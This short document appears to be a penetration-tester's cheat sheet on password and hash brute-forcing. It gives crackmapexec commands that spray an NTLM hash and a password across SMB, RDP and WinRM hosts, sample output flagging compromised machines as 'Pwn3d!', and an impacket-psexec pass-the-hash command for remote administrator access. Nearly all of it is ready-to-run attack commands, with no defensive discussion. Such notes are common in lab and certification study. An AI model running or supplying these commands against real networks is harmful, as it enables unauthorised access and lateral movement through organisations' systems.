Previouspassword/hash bruteforcing
- crackmapexec smb -H ee0c207898a5bccc01f38115019ca2fb -u administrator --local-auth 10.21.1.20-24
- example output:
SVCLIENT\administrator:ee0c207898a5bccc01f38115019ca2fb (Pwn3d!) - already compromised
SVCLIENT7\administrator:ee0c207898a5bccc01f38115019ca2fb (Pwn3d!)
- impacket-psexec 'SVCLIENT7/administrator@10.21.1.24' -hashes ':ee0c207898a5bccc01f38115019ca2fb’
- Also , when machine is part of Domain
- crackmapexec smb -p Test! -u sario -d NETMED 172.16.124.82-83
- Other service
- RDP
- crackmapexec rdp -p Test! -u sario -d NETMED 172.16.124.82-83
- Winrm
- crackmapexec winrm -p Test! -u sario -d NETMED 172.16.124.82-83